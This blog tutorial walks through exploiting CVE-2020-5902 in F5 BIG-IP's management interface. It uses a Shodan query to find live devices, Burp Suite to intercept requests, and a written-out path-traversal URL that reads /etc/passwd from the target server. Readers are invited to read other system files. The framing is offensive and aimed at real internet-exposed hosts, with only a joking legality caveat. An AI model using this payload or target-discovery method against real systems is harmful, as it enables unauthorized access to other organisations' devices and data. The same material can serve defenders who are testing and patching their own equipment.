Exploiting F5 Big IP Vulnerability | CVE-2020-5902

CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.

So today we are going to demonstrate how it is being used.

To exploit CVE-2020-5902, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

So first we need to find a vulnerable device, let’s go to Shodan.

In the search box top left type:

title:"BIG-IP®"

This will give us a list of vulnerable devices.

1

Now let’s navigate to one of the servers.

4

Perfect.

Open Burp Suite. This will intercept our traffic before it hits the server so that we can modify the process.

In Burp suite turn on the Intercept and refresh the page.

5

Okay we have the domain name, so before we send it to the server we are going to modify the URL and add some text.

https://{host}/tmui/login.jsp/..:/tmui/locallb/workspace/fileRead.jsp?fileNam
e=/etc/passwd

So let’s move to the Repeater tab to send the request.

6

As you can see it prints out the /etc/passwd file, you can use other commands too like /etc/hosts. Have fun but don’t do anything illegal. You will probably get a call from the..(insert law inforcment)

QuBits 2020-08-07

Support us below 😉

Support ls /blog

€5.00

Linux Foundation Certified Engineer (LFCE)

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.